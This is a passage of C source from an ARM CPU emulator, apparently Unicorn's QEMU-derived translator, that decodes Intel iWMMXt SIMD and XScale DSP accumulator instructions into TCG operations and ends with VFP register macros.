gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x800: case 0x900: case 0xc00: case 0xd00: /* WAVG2 */ wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); if (insn & (1 << 22)) { if (insn & (1 << 20)) gen_op_iwmmxt_avgw1_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_avgw0_M0_wRn(tcg_ctx, rd1); } else { if (insn & (1 << 20)) gen_op_iwmmxt_avgb1_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_avgb0_M0_wRn(tcg_ctx, rd1); } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x802: case 0x902: case 0xa02: case 0xb02: /* WALIGNR */ wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); tmp = iwmmxt_load_creg(tcg_ctx, ARM_IWMMXT_wCGR0 + ((insn >> 20) & 3)); tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 7); iwmmxt_load_reg(tcg_ctx, tcg_ctx->cpu_V1, rd1); gen_helper_iwmmxt_align(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1, tmp); tcg_temp_free_i32(tcg_ctx, tmp); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); break; case 0x601: case 0x605: case 0x609: case 0x60d: /* TINSR */ if (((insn >> 6) & 3) == 3) return 1; rd = (insn >> 12) & 0xf; wrd = (insn >> 16) & 0xf; tmp = load_reg(s, rd); gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, wrd); switch ((insn >> 6) & 3) { case 0: tmp2 = tcg_const_i32(tcg_ctx, 0xff); tmp3 = tcg_const_i32(tcg_ctx, (insn & 7) << 3); break; case 1: tmp2 = tcg_const_i32(tcg_ctx, 0xffff); tmp3 = tcg_const_i32(tcg_ctx, (insn & 3) << 4); break; case 2: tmp2 = tcg_const_i32(tcg_ctx, 0xffffffff); tmp3 = tcg_const_i32(tcg_ctx, (insn & 1) << 5); break; default: tmp2 = NULL; tmp3 = NULL; } gen_helper_iwmmxt_insr(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tmp, tmp2, tmp3); tcg_temp_free_i32(tcg_ctx, tmp3); tcg_temp_free_i32(tcg_ctx, tmp2); tcg_temp_free_i32(tcg_ctx, tmp); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); break; case 0x107: case 0x507: case 0x907: case 0xd07: /* TEXTRM */ rd = (insn >> 12) & 0xf; wrd = (insn >> 16) & 0xf; if (rd == 15 || ((insn >> 22) & 3) == 3) return 1; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, wrd); tmp = tcg_temp_new_i32(tcg_ctx); switch ((insn >> 22) & 3) { case 0: tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, (insn & 7) << 3); tcg_gen_extrl_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_M0); if (insn & 8) { tcg_gen_ext8s_i32(tcg_ctx, tmp, tmp); } else { tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 0xff); } break; case 1: tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, (insn & 3) << 4); tcg_gen_extrl_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_M0); if (insn & 8) { tcg_gen_ext16s_i32(tcg_ctx, tmp, tmp); } else { tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 0xffff); } break; case 2: tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, (insn & 1) << 5); tcg_gen_extrl_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_M0); break; } store_reg(s, rd, tmp); break; case 0x117: case 0x517: case 0x917: case 0xd17: /* TEXTRC */ if ((insn & 0x000ff008) != 0x0003f000 || ((insn >> 22) & 3) == 3) return 1; tmp = iwmmxt_load_creg(tcg_ctx, ARM_IWMMXT_wCASF); switch ((insn >> 22) & 3) { case 0: tcg_gen_shri_i32(tcg_ctx, tmp, tmp, ((insn & 7) << 2) + 0); break; case 1: tcg_gen_shri_i32(tcg_ctx, tmp, tmp, ((insn & 3) << 3) + 4); break; case 2: tcg_gen_shri_i32(tcg_ctx, tmp, tmp, ((insn & 1) << 4) + 12); break; } tcg_gen_shli_i32(tcg_ctx, tmp, tmp, 28); gen_set_nzcv(tmp); tcg_temp_free_i32(tcg_ctx, tmp); break; case 0x401: case 0x405: case 0x409: case 0x40d: /* TBCST */ if (((insn >> 6) & 3) == 3) return 1; rd = (insn >> 12) & 0xf; wrd = (insn >> 16) & 0xf; tmp = load_reg(s, rd); switch ((insn >> 6) & 3) { case 0: gen_helper_iwmmxt_bcstb(tcg_ctx, tcg_ctx->cpu_M0, tmp); break; case 1: gen_helper_iwmmxt_bcstw(tcg_ctx, tcg_ctx->cpu_M0, tmp); break; case 2: gen_helper_iwmmxt_bcstl(tcg_ctx, tcg_ctx->cpu_M0, tmp); break; } tcg_temp_free_i32(tcg_ctx, tmp); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); break; case 0x113: case 0x513: case 0x913: case 0xd13: /* TANDC */ if ((insn & 0x000ff00f) != 0x0003f000 || ((insn >> 22) & 3) == 3) return 1; tmp = iwmmxt_load_creg(tcg_ctx, ARM_IWMMXT_wCASF); tmp2 = tcg_temp_new_i32(tcg_ctx); tcg_gen_mov_i32(tcg_ctx, tmp2, tmp); switch ((insn >> 22) & 3) { case 0: for (i = 0; i < 7; i ++) { tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 4); tcg_gen_and_i32(tcg_ctx, tmp, tmp, tmp2); } break; case 1: for (i = 0; i < 3; i ++) { tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 8); tcg_gen_and_i32(tcg_ctx, tmp, tmp, tmp2); } break; case 2: tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 16); tcg_gen_and_i32(tcg_ctx, tmp, tmp, tmp2); break; } gen_set_nzcv(tmp); tcg_temp_free_i32(tcg_ctx, tmp2); tcg_temp_free_i32(tcg_ctx, tmp); break; case 0x01c: case 0x41c: case 0x81c: case 0xc1c: /* WACC */ wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); switch ((insn >> 22) & 3) { case 0: gen_helper_iwmmxt_addcb(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0); break; case 1: gen_helper_iwmmxt_addcw(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0); break; case 2: gen_helper_iwmmxt_addcl(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0); break; case 3: return 1; } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); break; case 0x115: case 0x515: case 0x915: case 0xd15: /* TORC */ if ((insn & 0x000ff00f) != 0x0003f000 || ((insn >> 22) & 3) == 3) return 1; tmp = iwmmxt_load_creg(tcg_ctx, ARM_IWMMXT_wCASF); tmp2 = tcg_temp_new_i32(tcg_ctx); tcg_gen_mov_i32(tcg_ctx, tmp2, tmp); switch ((insn >> 22) & 3) { case 0: for (i = 0; i < 7; i ++) { tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 4); tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2); } break; case 1: for (i = 0; i < 3; i ++) { tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 8); tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2); } break; case 2: tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 16); tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2); break; } gen_set_nzcv(tmp); tcg_temp_free_i32(tcg_ctx, tmp2); tcg_temp_free_i32(tcg_ctx, tmp); break; case 0x103: case 0x503: case 0x903: case 0xd03: /* TMOVMSK */ rd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; if ((insn & 0xf) != 0 || ((insn >> 22) & 3) == 3) return 1; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); tmp = tcg_temp_new_i32(tcg_ctx); switch ((insn >> 22) & 3) { case 0: gen_helper_iwmmxt_msbb(tcg_ctx, tmp, tcg_ctx->cpu_M0); break; case 1: gen_helper_iwmmxt_msbw(tcg_ctx, tmp, tcg_ctx->cpu_M0); break; case 2: gen_helper_iwmmxt_msbl(tcg_ctx, tmp, tcg_ctx->cpu_M0); break; } store_reg(s, rd, tmp); break; case 0x106: case 0x306: case 0x506: case 0x706: /* WCMPGT */ case 0x906: case 0xb06: case 0xd06: case 0xf06: wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); switch ((insn >> 22) & 3) { case 0: if (insn & (1 << 21)) gen_op_iwmmxt_cmpgtsb_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_cmpgtub_M0_wRn(tcg_ctx, rd1); break; case 1: if (insn & (1 << 21)) gen_op_iwmmxt_cmpgtsw_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_cmpgtuw_M0_wRn(tcg_ctx, rd1); break; case 2: if (insn & (1 << 21)) gen_op_iwmmxt_cmpgtsl_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_cmpgtul_M0_wRn(tcg_ctx, rd1); break; case 3: return 1; } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x00e: case 0x20e: case 0x40e: case 0x60e: /* WUNPCKEL */ case 0x80e: case 0xa0e: case 0xc0e: case 0xe0e: wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); switch ((insn >> 22) & 3) { case 0: if (insn & (1 << 21)) gen_op_iwmmxt_unpacklsb_M0(tcg_ctx); else gen_op_iwmmxt_unpacklub_M0(tcg_ctx); break; case 1: if (insn & (1 << 21)) gen_op_iwmmxt_unpacklsw_M0(tcg_ctx); else gen_op_iwmmxt_unpackluw_M0(tcg_ctx); break; case 2: if (insn & (1 << 21)) gen_op_iwmmxt_unpacklsl_M0(tcg_ctx); else gen_op_iwmmxt_unpacklul_M0(tcg_ctx); break; case 3: return 1; } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x00c: case 0x20c: case 0x40c: case 0x60c: /* WUNPCKEH */ case 0x80c: case 0xa0c: case 0xc0c: case 0xe0c: wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); switch ((insn >> 22) & 3) { case 0: if (insn & (1 << 21)) gen_op_iwmmxt_unpackhsb_M0(tcg_ctx); else gen_op_iwmmxt_unpackhub_M0(tcg_ctx); break; case 1: if (insn & (1 << 21)) gen_op_iwmmxt_unpackhsw_M0(tcg_ctx); else gen_op_iwmmxt_unpackhuw_M0(tcg_ctx); break; case 2: if (insn & (1 << 21)) gen_op_iwmmxt_unpackhsl_M0(tcg_ctx); else gen_op_iwmmxt_unpackhul_M0(tcg_ctx); break; case 3: return 1; } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x204: case 0x604: case 0xa04: case 0xe04: /* WSRL */ case 0x214: case 0x614: case 0xa14: case 0xe14: if (((insn >> 22) & 3) == 0) return 1; wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); tmp = tcg_temp_new_i32(tcg_ctx); if (gen_iwmmxt_shift(tcg_ctx, insn, 0xff, tmp)) { tcg_temp_free_i32(tcg_ctx, tmp); return 1; } switch ((insn >> 22) & 3) { case 1: gen_helper_iwmmxt_srlw(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); break; case 2: gen_helper_iwmmxt_srll(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); break; case 3: gen_helper_iwmmxt_srlq(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); break; } tcg_temp_free_i32(tcg_ctx, tmp); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x004: case 0x404: case 0x804: case 0xc04: /* WSRA */ case 0x014: case 0x414: case 0x814: case 0xc14: if (((insn >> 22) & 3) == 0) return 1; wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); tmp = tcg_temp_new_i32(tcg_ctx); if (gen_iwmmxt_shift(tcg_ctx, insn, 0xff, tmp)) { tcg_temp_free_i32(tcg_ctx, tmp); return 1; } switch ((insn >> 22) & 3) { case 1: gen_helper_iwmmxt_sraw(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); break; case 2: gen_helper_iwmmxt_sral(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); break; case 3: gen_helper_iwmmxt_sraq(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); break; } tcg_temp_free_i32(tcg_ctx, tmp); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x104: case 0x504: case 0x904: case 0xd04: /* WSLL */ case 0x114: case 0x514: case 0x914: case 0xd14: if (((insn >> 22) & 3) == 0) return 1; wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); tmp = tcg_temp_new_i32(tcg_ctx); if (gen_iwmmxt_shift(tcg_ctx, insn, 0xff, tmp)) { tcg_temp_free_i32(tcg_ctx, tmp); return 1; } switch ((insn >> 22) & 3) { case 1: gen_helper_iwmmxt_sllw(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); break; case 2: gen_helper_iwmmxt_slll(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); break; case 3: gen_helper_iwmmxt_sllq(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); break; } tcg_temp_free_i32(tcg_ctx, tmp); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x304: case 0x704: case 0xb04: case 0xf04: /* WROR */ case 0x314: case 0x714: case 0xb14: case 0xf14: if (((insn >> 22) & 3) == 0) return 1; wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); tmp = tcg_temp_new_i32(tcg_ctx); switch ((insn >> 22) & 3) { case 1: if (gen_iwmmxt_shift(tcg_ctx, insn, 0xf, tmp)) { tcg_temp_free_i32(tcg_ctx, tmp); return 1; } gen_helper_iwmmxt_rorw(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); break; case 2: if (gen_iwmmxt_shift(tcg_ctx, insn, 0x1f, tmp)) { tcg_temp_free_i32(tcg_ctx, tmp); return 1; } gen_helper_iwmmxt_rorl(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); break; case 3: if (gen_iwmmxt_shift(tcg_ctx, insn, 0x3f, tmp)) { tcg_temp_free_i32(tcg_ctx, tmp); return 1; } gen_helper_iwmmxt_rorq(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); break; } tcg_temp_free_i32(tcg_ctx, tmp); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x116: case 0x316: case 0x516: case 0x716: /* WMIN */ case 0x916: case 0xb16: case 0xd16: case 0xf16: wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); switch ((insn >> 22) & 3) { case 0: if (insn & (1 << 21)) gen_op_iwmmxt_minsb_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_minub_M0_wRn(tcg_ctx, rd1); break; case 1: if (insn & (1 << 21)) gen_op_iwmmxt_minsw_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_minuw_M0_wRn(tcg_ctx, rd1); break; case 2: if (insn & (1 << 21)) gen_op_iwmmxt_minsl_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_minul_M0_wRn(tcg_ctx, rd1); break; case 3: return 1; } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); break; case 0x016: case 0x216: case 0x416: case 0x616: /* WMAX */ case 0x816: case 0xa16: case 0xc16: case 0xe16: wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); switch ((insn >> 22) & 3) { case 0: if (insn & (1 << 21)) gen_op_iwmmxt_maxsb_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_maxub_M0_wRn(tcg_ctx, rd1); break; case 1: if (insn & (1 << 21)) gen_op_iwmmxt_maxsw_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_maxuw_M0_wRn(tcg_ctx, rd1); break; case 2: if (insn & (1 << 21)) gen_op_iwmmxt_maxsl_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_maxul_M0_wRn(tcg_ctx, rd1); break; case 3: return 1; } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); break; case 0x002: case 0x102: case 0x202: case 0x302: /* WALIGNI */ case 0x402: case 0x502: case 0x602: case 0x702: wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); tmp = tcg_const_i32(tcg_ctx, (insn >> 20) & 3); iwmmxt_load_reg(tcg_ctx, tcg_ctx->cpu_V1, rd1); gen_helper_iwmmxt_align(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1, tmp); tcg_temp_free_i32(tcg_ctx, tmp); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); break; case 0x01a: case 0x11a: case 0x21a: case 0x31a: /* WSUB */ case 0x41a: case 0x51a: case 0x61a: case 0x71a: case 0x81a: case 0x91a: case 0xa1a: case 0xb1a: case 0xc1a: case 0xd1a: case 0xe1a: case 0xf1a: wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); switch ((insn >> 20) & 0xf) { case 0x0: gen_op_iwmmxt_subnb_M0_wRn(tcg_ctx, rd1); break; case 0x1: gen_op_iwmmxt_subub_M0_wRn(tcg_ctx, rd1); break; case 0x3: gen_op_iwmmxt_subsb_M0_wRn(tcg_ctx, rd1); break; case 0x4: gen_op_iwmmxt_subnw_M0_wRn(tcg_ctx, rd1); break; case 0x5: gen_op_iwmmxt_subuw_M0_wRn(tcg_ctx, rd1); break; case 0x7: gen_op_iwmmxt_subsw_M0_wRn(tcg_ctx, rd1); break; case 0x8: gen_op_iwmmxt_subnl_M0_wRn(tcg_ctx, rd1); break; case 0x9: gen_op_iwmmxt_subul_M0_wRn(tcg_ctx, rd1); break; case 0xb: gen_op_iwmmxt_subsl_M0_wRn(tcg_ctx, rd1); break; default: return 1; } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x01e: case 0x11e: case 0x21e: case 0x31e: /* WSHUFH */ case 0x41e: case 0x51e: case 0x61e: case 0x71e: case 0x81e: case 0x91e: case 0xa1e: case 0xb1e: case 0xc1e: case 0xd1e: case 0xe1e: case 0xf1e: wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); tmp = tcg_const_i32(tcg_ctx, ((insn >> 16) & 0xf0) | (insn & 0x0f)); gen_helper_iwmmxt_shufh(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp); tcg_temp_free_i32(tcg_ctx, tmp); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x018: case 0x118: case 0x218: case 0x318: /* WADD */ case 0x418: case 0x518: case 0x618: case 0x718: case 0x818: case 0x918: case 0xa18: case 0xb18: case 0xc18: case 0xd18: case 0xe18: case 0xf18: wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); switch ((insn >> 20) & 0xf) { case 0x0: gen_op_iwmmxt_addnb_M0_wRn(tcg_ctx, rd1); break; case 0x1: gen_op_iwmmxt_addub_M0_wRn(tcg_ctx, rd1); break; case 0x3: gen_op_iwmmxt_addsb_M0_wRn(tcg_ctx, rd1); break; case 0x4: gen_op_iwmmxt_addnw_M0_wRn(tcg_ctx, rd1); break; case 0x5: gen_op_iwmmxt_adduw_M0_wRn(tcg_ctx, rd1); break; case 0x7: gen_op_iwmmxt_addsw_M0_wRn(tcg_ctx, rd1); break; case 0x8: gen_op_iwmmxt_addnl_M0_wRn(tcg_ctx, rd1); break; case 0x9: gen_op_iwmmxt_addul_M0_wRn(tcg_ctx, rd1); break; case 0xb: gen_op_iwmmxt_addsl_M0_wRn(tcg_ctx, rd1); break; default: return 1; } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x008: case 0x108: case 0x208: case 0x308: /* WPACK */ case 0x408: case 0x508: case 0x608: case 0x708: case 0x808: case 0x908: case 0xa08: case 0xb08: case 0xc08: case 0xd08: case 0xe08: case 0xf08: if (!(insn & (1 << 20)) || ((insn >> 22) & 3) == 0) return 1; wrd = (insn >> 12) & 0xf; rd0 = (insn >> 16) & 0xf; rd1 = (insn >> 0) & 0xf; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, rd0); switch ((insn >> 22) & 3) { case 1: if (insn & (1 << 21)) gen_op_iwmmxt_packsw_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_packuw_M0_wRn(tcg_ctx, rd1); break; case 2: if (insn & (1 << 21)) gen_op_iwmmxt_packsl_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_packul_M0_wRn(tcg_ctx, rd1); break; case 3: if (insn & (1 << 21)) gen_op_iwmmxt_packsq_M0_wRn(tcg_ctx, rd1); else gen_op_iwmmxt_packuq_M0_wRn(tcg_ctx, rd1); break; } gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); gen_op_iwmmxt_set_cup(tcg_ctx); break; case 0x201: case 0x203: case 0x205: case 0x207: case 0x209: case 0x20b: case 0x20d: case 0x20f: case 0x211: case 0x213: case 0x215: case 0x217: case 0x219: case 0x21b: case 0x21d: case 0x21f: wrd = (insn >> 5) & 0xf; rd0 = (insn >> 12) & 0xf; rd1 = (insn >> 0) & 0xf; if (rd0 == 0xf || rd1 == 0xf) return 1; gen_op_iwmmxt_movq_M0_wRn(tcg_ctx, wrd); tmp = load_reg(s, rd0); tmp2 = load_reg(s, rd1); switch ((insn >> 16) & 0xf) { case 0x0: /* TMIA */ gen_helper_iwmmxt_muladdsl(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tmp, tmp2); break; case 0x8: /* TMIAPH */ gen_helper_iwmmxt_muladdsw(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tmp, tmp2); break; case 0xc: case 0xd: case 0xe: case 0xf: /* TMIAxy */ if (insn & (1 << 16)) tcg_gen_shri_i32(tcg_ctx, tmp, tmp, 16); if (insn & (1 << 17)) tcg_gen_shri_i32(tcg_ctx, tmp2, tmp2, 16); gen_helper_iwmmxt_muladdswl(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tmp, tmp2); break; default: tcg_temp_free_i32(tcg_ctx, tmp2); tcg_temp_free_i32(tcg_ctx, tmp); return 1; } tcg_temp_free_i32(tcg_ctx, tmp2); tcg_temp_free_i32(tcg_ctx, tmp); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, wrd); gen_op_iwmmxt_set_mup(tcg_ctx); break; default: return 1; } return 0; } /* Disassemble an XScale DSP instruction. Returns nonzero if an error occurred (ie. an undefined instruction). */ static int disas_dsp_insn(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int acc, rd0, rd1, rdhi, rdlo; TCGv_i32 tmp, tmp2; if ((insn & 0x0ff00f10) == 0x0e200010) { /* Multiply with Internal Accumulate Format */ rd0 = (insn >> 12) & 0xf; rd1 = insn & 0xf; acc = (insn >> 5) & 7; if (acc != 0) return 1; tmp = load_reg(s, rd0); tmp2 = load_reg(s, rd1); switch ((insn >> 16) & 0xf) { case 0x0: /* MIA */ gen_helper_iwmmxt_muladdsl(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tmp, tmp2); break; case 0x8: /* MIAPH */ gen_helper_iwmmxt_muladdsw(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tmp, tmp2); break; case 0xc: /* MIABB */ case 0xd: /* MIABT */ case 0xe: /* MIATB */ case 0xf: /* MIATT */ if (insn & (1 << 16)) tcg_gen_shri_i32(tcg_ctx, tmp, tmp, 16); if (insn & (1 << 17)) tcg_gen_shri_i32(tcg_ctx, tmp2, tmp2, 16); gen_helper_iwmmxt_muladdswl(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tmp, tmp2); break; default: return 1; } tcg_temp_free_i32(tcg_ctx, tmp2); tcg_temp_free_i32(tcg_ctx, tmp); gen_op_iwmmxt_movq_wRn_M0(tcg_ctx, acc); return 0; } if ((insn & 0x0fe00ff8) == 0x0c400000) { /* Internal Accumulator Access Format */ rdhi = (insn >> 16) & 0xf; rdlo = (insn >> 12) & 0xf; acc = insn & 7; if (acc != 0) return 1; if (insn & ARM_CP_RW_BIT) { /* MRA */ iwmmxt_load_reg(tcg_ctx, tcg_ctx->cpu_V0, acc); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cpu_R[rdlo], tcg_ctx->cpu_V0); tcg_gen_extrh_i64_i32(tcg_ctx, tcg_ctx->cpu_R[rdhi], tcg_ctx->cpu_V0); tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_R[rdhi], tcg_ctx->cpu_R[rdhi], (1 << (40 - 32)) - 1); } else { /* MAR */ tcg_gen_concat_i32_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_R[rdlo], tcg_ctx->cpu_R[rdhi]); iwmmxt_store_reg(tcg_ctx, tcg_ctx->cpu_V0, acc); } return 0; } return 1; } #ifdef _MSC_VER #define VFP_REG_SHR_NEG(insn, n) ((insn) << -(n)) #define VFP_SREG_NEG(insn, bigbit, smallbit) \ ((VFP_REG_SHR_NEG(insn, bigbit - 1) & 0x1e) | (((insn) >> (smallbit)) & 1)) #define VFP_REG_SHR_POS(x, n) ((insn) >> (n)) #define VFP_SREG_POS(insn, bigbit, smallbit) \ ((VFP_REG_SHR_POS(insn, bigbit - 1) & 0x1e) | (((insn) >> (smallbit)) & 1)) #else #define VFP_REG_SHR(x, n) (((n) > 0) ? (x) >> (n) : (x) << -(n)) #define VFP_SREG(insn, bigbit, smallbit) \ ((VFP_REG_SHR(insn, bigbit - 1) & 0x1e) | (((insn) >> (smallbit)) & 